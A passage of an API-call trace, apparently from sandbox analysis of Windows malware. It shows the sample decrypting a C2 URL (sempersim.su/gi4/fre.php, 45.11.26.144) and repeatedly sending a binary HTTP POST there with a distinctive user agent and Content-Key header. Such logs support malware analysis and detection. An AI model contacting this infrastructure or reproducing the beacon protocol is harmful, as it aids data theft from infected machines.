hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0183.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.528] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0183.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.529] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.529] GetProcessHeap () returned 0x5b0000 [0183.529] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0183.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.536] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0183.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.540] CryptDestroyKey (hKey=0x5bde08) returned 1 [0183.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.541] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0183.541] GetProcessHeap () returned 0x5b0000 [0183.541] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0183.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.542] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.543] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.544] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.545] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.545] GetProcessHeap () returned 0x5b0000 [0183.545] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0183.545] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0183.545] GetProcessHeap () returned 0x5b0000 [0183.545] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0183.545] GetProcessHeap () returned 0x5b0000 [0183.546] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0183.548] GetProcessHeap () returned 0x5b0000 [0183.548] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0183.549] GetProcessHeap () returned 0x5b0000 [0183.549] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0183.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.550] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0183.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.555] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0183.565] GetProcessHeap () returned 0x5b0000 [0183.565] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0183.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.566] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0183.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.566] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0183.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.567] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.567] GetProcessHeap () returned 0x5b0000 [0183.568] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0183.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.569] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0183.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.570] CryptDestroyKey (hKey=0x5bde08) returned 1 [0183.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.571] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0183.571] GetProcessHeap () returned 0x5b0000 [0183.571] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0183.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.572] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0183.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.573] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0183.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0183.573] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0183.573] GetProcessHeap () returned 0x5b0000 [0183.574] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0183.574] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0183.575] GetProcessHeap () returned 0x5b0000 [0183.575] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9c0 [0183.575] socket (af=2, type=1, protocol=6) returned 0x2dc [0183.576] connect (s=0x2dc, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0183.671] FreeAddrInfoW (pAddrInfo=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0183.671] GetProcessHeap () returned 0x5b0000 [0183.671] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0183.671] GetProcessHeap () returned 0x5b0000 [0183.671] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0183.672] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0183.673] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0183.673] GetProcessHeap () returned 0x5b0000 [0183.673] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0183.673] GetProcessHeap () returned 0x5b0000 [0183.674] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0183.674] GetProcessHeap () returned 0x5b0000 [0183.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3308 [0183.674] GetProcessHeap () returned 0x5b0000 [0183.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0183.674] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0183.675] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0183.675] GetProcessHeap () returned 0x5b0000 [0183.675] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0183.675] GetProcessHeap () returned 0x5b0000 [0183.676] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0183.676] send (s=0x2dc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0183.677] send (s=0x2dc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0183.677] GetProcessHeap () returned 0x5b0000 [0183.677] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0183.677] recv (in: s=0x2dc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0185.197] GetProcessHeap () returned 0x5b0000 [0185.198] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0185.198] GetProcessHeap () returned 0x5b0000 [0185.198] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0185.198] GetProcessHeap () returned 0x5b0000 [0185.198] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0185.198] GetProcessHeap () returned 0x5b0000 [0185.199] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0185.199] closesocket (s=0x2dc) returned 0 [0185.199] GetProcessHeap () returned 0x5b0000 [0185.199] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9c0 | out: hHeap=0x5b0000) returned 1 [0185.199] GetProcessHeap () returned 0x5b0000 [0185.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0185.200] GetProcessHeap () returned 0x5b0000 [0185.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0185.200] GetProcessHeap () returned 0x5b0000 [0185.200] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0185.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x11e8) returned 0x2dc [0185.202] Sleep (dwMilliseconds=0xea60) [0185.220] GetProcessHeap () returned 0x5b0000 [0185.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0185.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.221] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0185.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.227] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0185.283] GetProcessHeap () returned 0x5b0000 [0185.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0185.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.284] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0185.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.285] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0185.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.286] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.286] GetProcessHeap () returned 0x5b0000 [0185.286] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0185.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.287] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0185.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.288] CryptDestroyKey (hKey=0x5be288) returned 1 [0185.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.289] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0185.289] GetProcessHeap () returned 0x5b0000 [0185.289] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0185.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.290] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.291] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.292] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.293] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.293] GetProcessHeap () returned 0x5b0000 [0185.293] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0185.293] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0185.294] GetProcessHeap () returned 0x5b0000 [0185.294] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0185.294] GetProcessHeap () returned 0x5b0000 [0185.294] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0185.294] GetProcessHeap () returned 0x5b0000 [0185.295] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0185.295] GetProcessHeap () returned 0x5b0000 [0185.295] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0185.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.364] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0185.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.369] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0185.375] GetProcessHeap () returned 0x5b0000 [0185.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0185.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.376] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0185.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.377] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0185.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.378] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.378] GetProcessHeap () returned 0x5b0000 [0185.379] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0185.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.379] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0185.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.380] CryptDestroyKey (hKey=0x5be048) returned 1 [0185.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0185.381] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0185.381] GetProcessHeap () returned 0x5b0000 [0185.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0185.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.382] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0185.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.382] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0185.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0185.383] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0185.383] GetProcessHeap () returned 0x5b0000 [0185.383] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0185.383] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0185.385] GetProcessHeap () returned 0x5b0000 [0185.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa80 [0185.385] socket (af=2, type=1, protocol=6) returned 0x2e0 [0185.386] connect (s=0x2e0, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0185.455] FreeAddrInfoW (pAddrInfo=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0185.455] GetProcessHeap () returned 0x5b0000 [0185.455] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0185.455] GetProcessHeap () returned 0x5b0000 [0185.455] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0185.456] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0185.457] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0185.457] GetProcessHeap () returned 0x5b0000 [0185.458] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0185.458] GetProcessHeap () returned 0x5b0000 [0185.458] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0185.458] GetProcessHeap () returned 0x5b0000 [0185.458] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e88 [0185.458] GetProcessHeap () returned 0x5b0000 [0185.458] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0185.460] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0185.461] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0185.461] GetProcessHeap () returned 0x5b0000 [0185.461] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0185.461] GetProcessHeap () returned 0x5b0000 [0185.461] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0185.461] send (s=0x2e0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0185.462] send (s=0x2e0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0185.462] GetProcessHeap () returned 0x5b0000 [0185.462] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0185.462] recv (in: s=0x2e0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0186.798] GetProcessHeap () returned 0x5b0000 [0186.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0186.799] GetProcessHeap () returned 0x5b0000 [0186.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0186.799] GetProcessHeap () returned 0x5b0000 [0186.800] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0186.800] GetProcessHeap () returned 0x5b0000 [0186.800] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0186.800] closesocket (s=0x2e0) returned 0 [0186.801] GetProcessHeap () returned 0x5b0000 [0186.801] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa80 | out: hHeap=0x5b0000) returned 1 [0186.801] GetProcessHeap () returned 0x5b0000 [0186.801] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0186.801] GetProcessHeap () returned 0x5b0000 [0186.802] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0186.802] GetProcessHeap () returned 0x5b0000 [0186.802] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0186.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1120) returned 0x2e0 [0186.803] Sleep (dwMilliseconds=0xea60) [0186.818] GetProcessHeap () returned 0x5b0000 [0186.818] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0186.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.819] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0186.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.826] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0186.833] GetProcessHeap () returned 0x5b0000 [0186.833] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0186.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.834] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0186.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.835] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0186.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.836] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.836] GetProcessHeap () returned 0x5b0000 [0186.836] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0186.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.837] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, 